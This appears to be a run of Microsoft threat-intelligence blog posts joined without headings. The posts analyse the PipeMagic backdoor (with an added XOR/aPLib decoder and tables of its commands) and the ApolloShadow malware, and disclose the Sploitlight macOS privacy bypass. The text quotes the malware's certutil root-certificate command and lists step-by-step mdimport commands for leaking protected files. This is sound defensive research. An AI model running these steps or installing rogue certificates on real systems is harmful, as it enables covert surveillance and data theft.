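The XOR-then-aPLib recovery of the embedded network module as an added Python example; this is not code from the sample or from Microsoft. The key is the 32 bytes in the dump above. The decoder is an implementation of the public aPLib depack algorithm (first byte copied verbatim, then a tag-bit stream of literals, gamma-coded matches, single-byte short matches and 4-bit-offset matches, ended by a short match with offset 0). Two things are assumptions of the example rather than facts from the page: that the XOR is a plain repeating-key XOR, and that the embedded data is a raw aPLib stream without the optional 'AP32' container header. The compressed blob in the demo at the bottom is hand-assembled for this example, not data from the sample.

```python
XOR_KEY = bytes.fromhex(
    "91df5d0e9c64cdbdc246f24b6bce4adc"
    "aa38f9600fe4e498ed0546f1cad954c5"
)


def xor_with_key(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR (assumed scheme); symmetric, so it undoes what the dropper applied."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


class _BitReader:
    """aPLib tag-bit reader: bits are consumed MSB-first from tag bytes pulled from the stream."""

    def __init__(self, src: bytes, pos: int):
        self.src, self.pos, self.tag, self.count = src, pos, 0, 0

    def byte(self) -> int:
        b = self.src[self.pos]
        self.pos += 1
        return b

    def bit(self) -> int:
        if self.count == 0:
            self.tag, self.count = self.byte(), 8
        bit = (self.tag >> 7) & 1
        self.tag = (self.tag << 1) & 0xFF
        self.count -= 1
        return bit

    def gamma(self) -> int:
        """Elias-gamma style code as used by aPLib: data bit, then continue-bit, starting from 1."""
        result = 1
        while True:
            result = (result << 1) + self.bit()
            if not self.bit():
                return result


def aplib_depack(src: bytes) -> bytes:
    """Decompress a raw aPLib stream (no 'AP32' header) into the original bytes."""
    out = bytearray([src[0]])            # first byte is stored verbatim
    rd = _BitReader(src, 1)
    r0, lwm = -1, 0                      # last offset, and 'last was match' flag
    while True:
        if not rd.bit():                 # 0: literal byte
            out.append(rd.byte())
            lwm = 0
        elif not rd.bit():               # 10: gamma-coded offset/length match
            offs = rd.gamma()
            if lwm == 0 and offs == 2:   # reuse the previous offset
                offs = r0
                length = rd.gamma()
            else:
                offs -= 3 if lwm == 0 else 2
                offs = (offs << 8) + rd.byte()
                length = rd.gamma()
                if offs >= 32000:
                    length += 1
                if offs >= 1280:
                    length += 1
                if offs < 128:
                    length += 2
                r0 = offs
            for _ in range(length):
                out.append(out[-offs])
            lwm = 1
        elif not rd.bit():               # 110: short match, or end marker when offset is 0
            b = rd.byte()
            length = 2 + (b & 1)
            offs = b >> 1
            if offs == 0:
                return bytes(out)
            for _ in range(length):
                out.append(out[-offs])
            r0, lwm = offs, 1
        else:                            # 111: 4-bit offset single byte (offset 0 means 0x00)
            offs = 0
            for _ in range(4):
                offs = (offs << 1) + rd.bit()
            out.append(out[-offs] if offs else 0)
            lwm = 0


def recover_network_module(blob: bytes, key: bytes = XOR_KEY) -> bytes:
    """The two-step recovery the backdoor performs on its embedded module data."""
    return aplib_depack(xor_with_key(blob, key))


if __name__ == "__main__":
    # Hand-built stream (constructed for this example): 'A', literal 'B',
    # gamma match offset 2 length 4, end marker -> b"ABABAB".
    demo = xor_with_key(b"A\x51B\x02\x80\x00")
    print(recover_network_module(demo))
```

Running the decoder on real carved data, a non-terminating loop or an IndexError almost always means the wrong XOR key or a wrong start offset rather than a decoder bug, because every branch of the format eventually reaches the offset-0 short match.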
Using the decrypted module data, the malware populates the following structure representing a module node in the network linked list.
struct network_module_node
{
    __int64 module_index;        // module index in network linked list
    BYTE    *module_base;        // pointer to module base
    __int64 module_size;         // module size
    __int64 module_main_func;    // pointer to the main function
    BYTE    *module_entrypoint;  // pointer to the module's entry point
    BYTE    terminate_flag;      // terminate flag
};
Once the node is initialized and the module is loaded into memory, the malware executes the module’s entry point, passing a pointer to its own main function as a parameter.
Figure 8. Launching network module’s entry point
In the network module’s entry point, the module writes the address of its actual main function into its third argument. The backdoor stores that address in the module_main_func field of the node structure, so it can later call the module’s main function directly.
Figure 9. Network module’s entry point
Finally, the backdoor inserts the module node into the network linked list and invokes its main function, passing the C2 address extracted from the configuration.
Figure 10. Launching network module’s main function
Network module: Establishing C2 connection
When launched by the backdoor, the network module first exports and registers three of its internal functions for use by the backdoor:
A function to send data to the C2 server over TCP
A function that returns the constant value 0x8ca
A function to set a stop signal, instructing both the backdoor and the network module to terminate all C2 communications
The backdoor uses the first exported function to send data to the C2 server through the network module, rather than handling communication directly.
Figure 11. Network module’s exported functions
After initialization, the network module begins its communication routine with the C2 server. On each execution, it limits itself to a maximum of five communication attempts with the C2.
Once a TCP connection is established, the module sends the following HTTP GET request to initiate communication with the C2 server. The path includes a randomly generated 16-character hexadecimal string that is unique for each connection.
Figure 12. Setting up and sending initial GET request
Once a valid response is received from the C2 server, the network module transfers execution back to the backdoor. At this point, the backdoor collects system information and sends it to the C2 server using the network module’s communication function (annotated as C2_send_request in Figure 11).
System information collection
After the C2 connection is successfully established by the network module, the backdoor collects a comprehensive set of system and internal state information to send back to the C2 server:
Generated bot ID
Network module’s index in the network linked list
Operating system version
Computer name
Malware executable name
Malware process ID
Whether the host belongs to the Network Configuration Operators SID group
Domain NetBIOS name
Whether the malware is running as a 64-bit process
List of all LAN domain groups the host belongs to
Integrity level of the malware process
User domain name
Session ID of the malware process
Host’s IP address
Malware’s current working directory
Data from all nodes in the execute linked list
Data from all nodes in the unknown linked list
This host information is commonly collected by backdoors to be used as the host’s unique identifier when the malware attempts to establish a connection with its C2 server. Once this information is gathered, the PipeMagic backdoor invokes the network module’s communication function to transmit the data to the C2 server over the established TCP socket.
After the data is sent, execution is handed back to the network module, which waits for and receives the C2 response.
Finally, the network module transfers control back to the backdoor, passing along the C2 response so the backdoor can proceed with executing its core malicious capabilities.
Processing C2 response
Once the backdoor receives a response from the C2 server, it parses the data to extract the outer processing command. This command determines how the backdoor should handle the response and what actions to take next.
Below is a list of known processing codes and their corresponding functionalities:
Processing code | Processing data | Functionality
0x1 | Backdoor code and data | Executes core backdoor functionality using modules from the execute and payload linked lists
0x3 | Module index | Looks up the module node with the provided index and executes the module code
0x5 | A message | Sends the received message back to the C2 server as an acknowledgment or echo
0x7 | N/A | Shuts down the network module and stops all C2 communication
0x8 | Backdoor code and data | Executes backdoor functionality using modules from the unknown linked list
0xA | Module node argument | Invokes all modules in the execute linked list with the specified argument
Backdoor capabilities: Execute and payload linked list
Among all the outer processing commands, processing code 0x1 is the most significant. When this code is received, the associated processing data contains inner backdoor commands and arguments that enable PipeMagic to perform a wide range of backdoor operations.
Below is a list of known backdoor codes and their corresponding functionalities:
Backdoor code | Backdoor arguments | Functionality
0x1 | N/A | Retrieves metadata from all module nodes in the payload linked list
0x2 | arg1: Module index; arg2: Module data length; arg3: Module name; arg4: Module attribute; arg5: Module SHA1 hash | Inserts a new module node into the payload linked list and initializes it with the provided data; skips insertion if a matching module (by index and hash) already exists
0x3 | arg1: Module index; arg2: Hash flag; arg3: Write offset; arg4: Write length; arg5: Payload data | Locates a module node in the payload linked list using the provided index and writes data at the specified offset; if the hash flag is provided, recomputes and updates the SHA-1 hash after RC4 encryption and aPLib compression (depending on the module’s attribute)
0x4 | arg1: Module index; arg2: Read offset; arg3: Read length | Reads a segment of data from a module node in the payload linked list
0x5 | arg1: Module index | Deletes a module node from the payload linked list
0x6 | arg1: Module index; arg2: Write offset; arg3: Payload data; arg4: Write length | Writes data to a module node without updating the SHA-1 hash
0x7 | arg1: Module index | Retrieves the SHA-1 hash of a module node in the payload linked list
0x9 | N/A | Retrieves data from all module nodes in the execute linked list
0xA | arg1: Module index | Retrieves data from a specific module node in the execute linked list
0xB | arg1: Payload module index; arg2: Execute module index; arg3: Initialization flag | Loads a payload module into memory and binds it to a node in the execute linked list, then invokes its entry point
0xC | arg1: Module index | Executes the entry point of a module node in the execute linked list
0xD | N/A | Retrieves the user’s domain name
0xE | N/A | Retrieves the current C2 processing code and data
0xF | N/A | Renames the malware executable to “:fuckit” and marks it for self-deletion
0x10 | arg1: Lower index; arg2: Upper index | Deletes all module nodes in the payload linked list within the specified index range
0x11 | arg1: Module name | Deletes a module node in the payload linked list by name instead of index
0x13 | N/A | Enumerates all running processes and collects session ID, PID, PPID, creation time, executable path, user domain, and architecture (32-bit or 64-bit)
0x14 | arg1: Module index; arg2: New module name; arg3: Module hash length; arg4: Module hash; arg5: Pipe data to send; arg6: Pipe name; arg7: Max elapsed time | Replaces a module node in the payload linked list; sends data to a named pipe and parses the response to receive the payload module data
0x15 | arg1: Module index; arg2: New module name; arg3: New module attribute; arg4: Module hash length; arg5: Module hash; arg6: Module data length; arg7: Module data | Replaces a module node in the payload linked list with a new one; the provided data is RC4-decrypted, aPLib-decompressed, and validated by SHA-1 hash before being added to the payload module node
0x17 | arg1: Module index; arg2: Pipe data 1; arg3: Pipe data 2; arg4: Max elapsed time; arg5: Pipe name | Extracts and RC4-encrypts data from a module in the payload linked list; sends it to a named pipe along with the provided pipe data
Backdoor results are delivered to C2 over TCP. These inner backdoor codes provide the threat actor with granular control over module management, execution, and system reconnaissance, making PipeMagic a highly modular and extensible backdoor.
Backdoor capabilities: Unknown linked list
Processing code 0x8 functions similarly to processing code 0x1 in that it also contains inner backdoor code and data. However, this command is specifically designed to interact with the unknown linked list.
The purpose of this linked list remains unclear. It does not appear to play a critical role in the malware’s core functionality on the infected system. Below is a list of known backdoor codes associated with this processing command and their corresponding functionalities:
Backdoor code | Backdoor arguments | Functionality
0x1 | N/A | Retrieves metadata from all module nodes in the unknown linked list
0x2 | arg1: Module index | Looks up a module node in the unknown linked list and extracts its data
0x3 | arg1: Module index | Deletes a module node from the unknown linked list using the specified index
0x7 | arg1: Module index; arg2: New module size | Resizes the data buffer of a module node in the unknown linked list, either expanding or shrinking it based on the provided size
While the exact role of this list remains unclear, its structure and command handling mirror those of the payload and execute linked lists, suggesting it may serve as a staging area or auxiliary buffer for dynamically loaded modules.
Mitigation and protection guidance
Microsoft recommends the following mitigations to reduce the impact of activity associated with PipeMagic and Storm-2460:
Ensure that tamper protection is enabled in Microsoft Defender for Endpoint.
Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume. Use Microsoft Defender Vulnerability Management to assess your current status and deploy any updates that might have been missed.
Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
Microsoft Defender XDR detections
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects this threat as the following malware:
PipeMagic (Win32/64)
Microsoft Defender for Endpoint
The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:
‘PipeMagic’ malware was detected
‘PipeMagic’ malware was prevented
An active ‘PipeMagic’ malware was blocked
An active ‘PipeMagic’ malware process was detected while executing and terminated
The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.
A file or network connection related to a ransomware-linked emerging threat activity group detected
Microsoft Defender Vulnerability Management
Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:
CVE-2025-29824
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.
Microsoft Threat Intelligence has uncovered a cyberespionage campaign by the Russian state actor we track as Secret Blizzard that has been targeting embassies located in Moscow using an adversary-in-the-middle (AiTM) position to deploy their custom ApolloShadow malware. ApolloShadow has the capability to install a trusted root certificate to trick devices into trusting malicious actor-controlled sites, enabling Secret Blizzard to maintain persistence on diplomatic devices, likely for intelligence collection. This campaign, which has been ongoing since at least 2024, poses a high risk to foreign embassies, diplomatic entities, and other sensitive organizations operating in Moscow, particularly to those entities who rely on local internet providers.
While we previously assessed with low confidence that the actor conducts cyberespionage activities within Russian borders against foreign and domestic entities, this is the first time we can confirm that they have the capability to do so at the Internet Service Provider (ISP) level. This means that diplomatic personnel using local ISP or telecommunications services in Russia are highly likely targets of Secret Blizzard’s AiTM position within those services. In our previous blog, we reported the actor likely leverages Russia’s domestic intercept systems such as the System for Operative Investigative Activities (SORM), which we assess may be integral in facilitating the actor’s current AiTM activity, judging from the large-scale nature of these operations.
This blog provides guidance on how organizations can protect against Secret Blizzard’s AiTM ApolloShadow campaign, including forcing or routing all traffic through an encrypted tunnel to a trusted network or using an alternative provider—such as a satellite-based connection—hosted within a country that does not control or influence the provider’s infrastructure. The blog also provides additional information on network defense, such as recommendations, indicators of compromise (IOCs), and detection details.
Secret Blizzard is attributed by the United States Cybersecurity and Infrastructure Security Agency (CISA) to the Russian Federal Security Service (FSB), Center 16. Secret Blizzard also overlaps with threat actors tracked by other security vendors under names such as VENOMOUS BEAR, Uroburos, Snake, Blue Python, Turla, Wraith, ATG26, and Waterbug.
As part of our continuous monitoring, analysis, and reporting of the threat landscape, we are sharing our observations on Secret Blizzard’s latest activity to raise awareness of this actor’s tradecraft and educate organizations on how to harden their attack surface against this and similar activity. Although this activity poses a high risk to entities within Russia, the defense measures included in this blog are broadly applicable and can help organizations in any region reduce their risk from similar threats. Microsoft is also tracking other groups using similar techniques, including those documented by ESET in a previous publication.
AiTM and ApolloShadow deployment
In February 2025, Microsoft Threat Intelligence observed Secret Blizzard conducting a cyberespionage campaign against foreign embassies located in Moscow, Russia, using an AiTM position to deploy the ApolloShadow malware to maintain persistence and collect intelligence from diplomatic entities. In an adversary-in-the-middle technique, the adversary positions itself between two or more networks to support follow-on activity. The Secret Blizzard AiTM position is likely facilitated by lawful intercept and notably includes the installation of root certificates under the guise of Kaspersky Anti-Virus (AV). We assess this allows for TLS/SSL stripping from the Secret Blizzard AiTM position, rendering the majority of the target’s browsing in clear text, including the delivery of certain tokens and credentials. Secret Blizzard has exhibited similar techniques in past cyberespionage campaigns to infect foreign ministries in Eastern Europe by tricking users into downloading a trojanized Flash installer from an AiTM position.
Initial access
In this most recent campaign, Secret Blizzard's initial access is facilitated by an AiTM position at the ISP/Telco level inside Russia, from which the actor redirects target devices by placing them behind a captive portal. Captive portals are legitimate web pages designed to manage network access, such as those encountered when connecting to the internet at a hotel or airport. Once a device is behind a captive portal, the Windows Test Connectivity Status Indicator kicks in; this is a legitimate service that determines whether a device has internet access by sending an HTTP GET request to hxxp://www.msftconnecttest[.]com/redirect, which should redirect to msn[.]com.
Delivery and installation
Once the system opens a browser window to this address, it is redirected to a separate actor-controlled domain that likely displays a certificate validation error, which prompts the target to download and execute ApolloShadow. After execution, ApolloShadow checks the privilege level of its process token. If the process is not already elevated, the malware displays a User Account Control (UAC) prompt asking the user to install certificates via a file named CertificateDB.exe, which masquerades as a Kaspersky installer; this installs root certificates and lets the actor gain elevated privileges on the system.
Figure 1. Secret Blizzard AiTM infection chain
ApolloShadow malware
ApolloShadow uses two execution paths depending on the privilege level of the running process. The token of the running process is retrieved using the GetTokenInformation API, and the returned TokenInformation value is checked to see whether the token's elevation type is TokenElevationTypeFull. If it is not, ApolloShadow takes the low privilege execution path.
Figure 2. ApolloShadow execution flow
Low privilege execution
When executing the low privilege path, the first action is to collect information about the host to send back to the AiTM-controlled command and control (C2) server. First, the host's IP information is collected using the GetIpAddrTable API, which returns the host's IPv4 address table. Each entry is individually Base64-encoded and delimited by a pipe character with \r\n appended, and the entries are then combined into one string. For example:
The encoded network information is added as a query string to a GET request with the destination URL hxxp://timestamp.digicert[.]com/registered. Two query parameters are included with the request, code and t. The code parameter contains a hardcoded set of characters and the t parameter carries the encoded IP address information, as shown below:
While the timestamp subdomain does exist for Digicert, the /registered resource does not. Due to the AiTM position of the actor, Secret Blizzard can use DNS manipulation to redirect legitimate-looking communication to the actor-controlled C2 and return an encoded VBScript as the second-stage payload.
When the response comes back from the redirected Digicert request, the file name that is used to write the script to disk is decoded for use. ApolloShadow uses string obfuscation in several places throughout the binary to hide critical strings. These strings are blocks of encoded characters that are encoded using XOR with a separate set of hardcoded constants. While this is not a particularly sophisticated technique, it is enough to obscure the strings from view at first glance. The strings are decoded as they are used and then re-encoded after use to remove traces of the strings from memory.
Figure 2. String decoding operation for VB script name
The decoded file name is edgB4ACD.vbs; the malware concatenates this string with the result of querying the TEMP environment variable to build the path of the target script. We were unable to recover the script, but the first 12 characters of the response are checked against the string MDERPWSAB64B. Once ApolloShadow has decoded the script, it executes it via the Windows API call CreateProcessW with a command line that launches wscript with the path to edgB4ACD.vbs.
Finally, the ApolloShadow process relaunches itself using ShellExecuteA, which presents the user with a UAC prompt; the malware relies on the user clicking through it to grant the malware the highest privileges available to their account.
Figure 3. UAC popup to request elevated privileges from the user
Elevated privilege execution
When the process is executed with sufficient elevated privileges, ApolloShadow alters the host by setting all networks to Private. This induces several changes, including making the host discoverable and relaxing firewall rules to enable file sharing. While we did not see any direct attempts at lateral movement, the most likely reason for these modifications is to make lateral movement on the network easier. ApolloShadow uses two different methods to perform this change.
The first method is through the network profile registry keys under SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles. The globally unique identifier (GUID) subkey of each connected network is parsed, and the malware sets the Category value to 0. This change sets the network's profile to Private after the host has been rebooted.
Figure 4. Registry settings for network profiles
The second method sets firewall rules directly using Component Object Model (COM) objects to enable file sharing and turn on network discovery. Several strings are decoded using the same method as above and concatenated to build the names of the firewall rule groups to enable:
FirewallAPI.dll,-32752 (enables the Network Discovery rule group)
FirewallAPI.dll,-28502 (enables all rules in the File and Printer Sharing group)
The strings are passed to the COM objects to enable the rules if they are not already enabled.
Figure 5. COM objects used to modify firewall rules
Both techniques have some crossover, but the following table provides a comparison overview of each method.
Technique | Purpose | Timing | Stealth | Effect
--- | --- | --- | --- | ---
Registry profile change | Sets network to Private | Requires reboot | High | Broadly relaxes firewall posture
COM-based rule enablement | Activates specific rules | Immediate | Moderate | Opens precise ports for discovery and sharing
From here, ApolloShadow presents the user with a window showing that the certificates are being installed.
Figure 6. Window displayed to the user during execution
A new thread performs the remainder of the functionality. The two root certificates being installed are written to the %TEMP% directory with a temporary name and the extension crt. The certificate installation is performed by using the Windows certutil utility and the temporary files are deleted following the execution of the commands.
certutil.exe -f -Enterprise -addstore ca "C:\Users\<username>\AppData\Local\Temp\crt53FF.tmp"
The malware must add a preference file to the Firefox preference directory because Firefox uses different certificate stores than browsers such as Chromium, which results in Firefox not trusting the root and enterprise store by default. ApolloShadow reads the registry key that points to the installation of the application and builds a path to the preference directory from there. A file is written to disk called wincert.js containing a preference modification for Firefox browsers, allowing Firefox to trust the root certificates added to the operating system’s certificate store.
The final step is to create an administrative user with the username UpdatusUser and a hardcoded password on the infected system using the Windows API NetUserAdd. The password is also set to never expire.
Figure 7. Administrator user added to infected system
At this point ApolloShadow is installed on the infected host and has persistent access through the new local administrator account.
Defending against Secret Blizzard activity
Microsoft recommends that all customers, and especially sensitive organizations operating in Moscow, implement the following recommendations to mitigate Secret Blizzard activity.
Route all traffic through an encrypted tunnel to a trusted network or use a virtual private network (VPN) service provider, such as a satellite-based provider, whose infrastructure is not controlled or influenced by outside parties.
Microsoft also recommends the following guidance to enhance protection and mitigate potential threats:
Practice the principle of least privilege, use multifactor authentication (MFA), and audit privileged account activity in your environments to slow and stop attackers. Avoid the use of domain-wide, admin-level service accounts and restrict local administrative privileges. These mitigation steps reduce the paths that attackers have available to them to accomplish their goals and lower the risk of the compromise spreading in your environment.
Regularly review highly privileged groups like Administrators, Remote Desktop Users, and Enterprise Admins. Threat actors may add accounts to these groups to maintain persistence and disguise their activity.
Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques.
Run endpoint detection and response (EDR) in block mode, so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
Turn on attack surface reduction rules to prevent common attack techniques. These rules, which can be configured by all Microsoft Defender Antivirus customers and not just those using the EDR solution, offer significant hardening against common attack vectors.
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects this threat as the following malware:
The following alerts might indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.
Secret Blizzard Actor activity detected
Suspicious root certificate installation
Suspicious certutil activity
User account created under suspicious circumstances
A script with suspicious content was observed
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Microsoft Defender XDR customers can run the following query to find related activity in their networks:
Surface devices that attempt to download a file within two minutes of a captive portal redirection. This activity may indicate a first-stage AiTM attack against the device, such as the one used by Secret Blizzard.
let CaptiveRedirectEvents = DeviceNetworkEvents
| where RemoteUrl contains "msftconnecttest.com/redirect"
| project DeviceId, RedirectTimestamp = Timestamp, RemoteUrl;
let FileDownloadEvents = DeviceFileEvents
| where ActionType == "FileDownloaded"
| project DeviceId, DownloadTimestamp = Timestamp, FileName, FolderPath;
CaptiveRedirectEvents
| join kind=inner (FileDownloadEvents) on DeviceId
| where DownloadTimestamp between (RedirectTimestamp .. (RedirectTimestamp + 2m))
| project DeviceId, RedirectTimestamp, RemoteUrl, DownloadTimestamp, FileName, FolderPath
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
Below are queries using Sentinel Advanced Security Information Model (ASIM) functions to hunt for threats across both Microsoft first-party and third-party data sources. ASIM also supports deploying parsers to specific workspaces from GitHub, using an ARM template or manually.
Detect network IP and domain indicators of compromise using ASIM
The below query checks IP address and domain indicators of compromise (IOCs) across the data sources supported by the ASIM Network Session parser.
//IP list and domain list- _Im_NetworkSession
let lookback = 30d;
let ioc_ip_addr = dynamic(["45.61.149.109"]);
let ioc_domains = dynamic(["kav-certificates.info"]);
_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains)
| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated),
EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor
Detect network and file hash indicators of compromise using ASIM
The below queries check IP address and file hash IOCs across the data sources supported by the ASIM Web Session parser.
Detect network indicators of compromise and domains using ASIM
//IP list - _Im_WebSession
let lookback = 30d;
let ioc_ip_addr = dynamic(["45.61.149.109"]);
let ioc_sha_hashes = dynamic(["13fafb1ae2d5de024e68f2e2fc820bc79ef0690c40dbfd70246bcc394c52ea20"]);
_Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr in (ioc_ip_addr) or FileSHA256 in (ioc_sha_hashes)
| summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated),
EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor
// Domain list - _Im_WebSession
let ioc_domains = dynamic(["kav-certificates.info"]);
_Im_WebSession (url_has_any = ioc_domains)
Detect file hash indicators of compromise using ASIM
The below query checks IP address and file hash IOCs across the data sources supported by the ASIM FileEvent parser.
Detect network and file hash indicators of compromise using ASIM
// file hash list - imFileEvent
let ioc_sha_hashes = dynamic(["13fafb1ae2d5de024e68f2e2fc820bc79ef0690c40dbfd70246bcc394c52ea20"]);
imFileEvent
| where SrcFileSHA256 in (ioc_sha_hashes) or
TargetFileSHA256 in (ioc_sha_hashes)
| extend AccountName = tostring(split(User, @'\')[1]),
AccountNTDomain = tostring(split(User, @'\')[0])
| extend AlgorithmType = "SHA256"
Indicators of compromise
Indicator | Type | Description
--- | --- | ---
kav-certificates[.]info | Domain | Actor-controlled domain that downloads the malware
Meet the experts behind Microsoft Threat Intelligence, Incident Response, and the Microsoft Security Response Center at our VIP Mixer at Black Hat 2025. Discover how our end-to-end platform can help you strengthen resilience and elevate your security posture.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Microsoft Threat Intelligence has discovered a macOS vulnerability that could allow attackers to steal private data of files normally protected by Transparency, Consent, and Control (TCC), such as files in the Downloads folder, as well as caches utilized by Apple Intelligence. While similar to prior TCC bypasses like HM-Surf and powerdir, the implications of this vulnerability, which we refer to as “Sploitlight” for its use of Spotlight plugins, are more severe due to its ability to extract and leak sensitive information cached by Apple Intelligence, such as precise geolocation data, photo and video metadata, face and person recognition data, search history and user preferences, and more. These risks are further complicated and heightened by the remote linking capability between iCloud accounts, meaning an attacker with access to a user’s macOS device could also exploit the vulnerability to determine remote information of other devices linked to the same iCloud account.
After discovering the bypass technique during proactive hunting for processes with privileged entitlements, we shared our findings with Apple through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR). Apple released a fix for this vulnerability, now identified as CVE-2025-31199, as part of security updates for macOS Sequoia, released on March 31, 2025. We thank the Apple security team for their collaboration in addressing this vulnerability and encourage macOS users to apply these security updates as soon as possible.
As a reminder, TCC is a technology designed to prevent applications from accessing users’ personal information, including services such as location services, camera, microphone, Downloads directory, and others, without obtaining prior consent and knowledge from users. The only legitimate method for an application to gain access to these services is through user approval via a popup prompt within the user interface or by granting per-app access in the operating system’s settings.
In this blog post, we display how, despite Spotlight plugins being carefully and heavily restricted to maintain their privileged access to sensitive files, they can still be abused to exfiltrate file contents. Our research demonstrates how this privileged access and the ability to manipulate these plugins blur the line between operating system components, like the mds daemon and mdworker task, and non-OS components, like the plugins themselves. Further, we show how the TCC bypass works against well-defined file types, as well as how it could be abused to get valuable data such as information tagged by Apple Intelligence and remote information of other iCloud account-linked devices.
Background: Spotlight importers
Spotlight is a built-in macOS application that can quickly find content on a device by means of indexing. Users can press the Command+Space shortcut to trigger a file search. Spotlight also supports plugins known as Spotlight importers that index further data found on a device. For example, Outlook can index emails so they appear in search. Those plugins are macOS bundles ending with a .mdimporter suffix, and can be listed by running the mdimport utility with the -L command line flag:
Figure 1. A list of Spotlight plugins on a typical system
To support that architecture, the technology works in a producer-consumer design, where tools such as Spotlight (or the mdfind command utility) consume data from index files that are saved locally, and an indexing service produces and updates those index files.
The indexing service is known as mds and acts as a system daemon. Upon file modifications, the kernel triggers the mds daemon, which in turn creates a heavily sandboxed task called mdworker, which runs the plugin logic and updates the index.
Spotlight plugins have been studied in the past; notable examples include:
Spotlight plugins declare which file types they can process via their Info.plist file, and when such a file is scanned by the mds daemon, an mdworker task will eventually invoke their GetMetadataForFile function.
Turning a plugin into a TCC bypass
We have covered several TCC bypasses in the past, such as CVE-2021-30970 (“powerdir”) and CVE-2024-44133 (“HM-Surf”). As a reminder, TCC is a technology that prevents apps from accessing users’ personal information, including services such as location services, camera, microphone, Downloads directory, and others, without their prior consent and knowledge. In this blog post, we shall focus primarily on access to private files protected by TCC, such as the Downloads directory, the Pictures directory, or the user’s Desktop.
Due to the privileged access that Spotlight plugins have to sensitive files for indexing purposes, Apple imposes heavy restrictions on them via its Sandbox capabilities. On modern macOS systems, Spotlight plugins are not even permitted to read or write any file other than the one being scanned. However, we have concluded that this is insufficient, as there are multiple ways for attackers to exfiltrate the file’s contents. In our exploit, we have decided to simply log the file’s bytes to the unified log in chunks:
Figure 2. Leaking the scanned file’s contents via logging
Assuming an attacker knows specific file types they wish to read, they can simply perform the following steps:
Change the bundle’s Info.plist and schema.xml files to declare the file types they wish to leak in UTI form. Since we assume an attacker runs locally, this is always possible to resolve, even for dynamic types.
Copy the bundle into ~/Library/Spotlight directory. Note the bundle does not need to be signed at all.
Force Spotlight to use the new bundle via the mdimport -r command, and validate it’s indeed loaded with the mdimport -L command.
Use mdimport -i <path> to recursively scan files under the given path and leak them. Note the calling app does not require TCC permissions to the indexed directory as it’s done by the mdworker task.
Use the log utility to read the files' contents.
The UTI of a dynamic type can be determined with the uttype utility, even if the calling app does not have TCC access to the relevant directory. For example, here is the resolution of the TCC-protected Photos.sqlite file:
Figure 3. Resolution of a dynamic type even despite lack of TCC permissions
Note that since the .mdimporter is an unsigned bundle, an attacker does not even need to recompile to adjust to other file types; they can simply modify Info.plist and schema.xml as they see fit. We therefore conclude that an attacker can trivially discover and read arbitrary files from sensitive directories normally protected by TCC. Our initial exploit focused on the Downloads folder; the Pictures folder drew our attention later.
We have coded a full proof-of-concept (POC) exploit code dubbed “Sploitlight” that automates this entire process and shared it with Apple:
